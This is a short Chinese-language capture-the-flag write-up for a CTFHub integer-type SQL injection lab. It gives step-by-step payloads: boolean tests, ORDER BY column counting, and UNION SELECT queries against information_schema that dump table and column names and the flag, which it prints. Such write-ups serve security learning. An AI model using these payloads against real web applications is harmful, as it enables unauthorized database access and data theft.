开启靶场,打开链接:
直接指明是SQL整数型注入,但还是来判断一下
(1)检查是否存在注入点
1 and 1=1#
返回正确
1 and 1=2#
返回错误
说明存在SQL整数型注入
(2)猜字段数
1 order by 2#
1 order by 3#
说明字段数是2
(3)爆数据库名
1 and 1=2 union select 1,database()#
得知数据库名是sqli
(4)爆表名
1 and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#
显示表名是news表和flag表,其中flag表是我们需要的
(5)爆列名
1 and 1=2 union select 1,column_name from information_schema.columns where table_schema='sqli' and table_name='flag'#
得知flag表的列名是flag
(6)爆字段内容(flag)
1 and 1=2 union select 1,group_concat(flag) from sqli.flag#
成功的得到flag:
ctfhub{0bdb6d621fc76a06fde34a00}
这里用sqlmap也是可以的,但我提前交了就不想再费时间重开一遍靶场了,待会就在"字符型注入"中试试了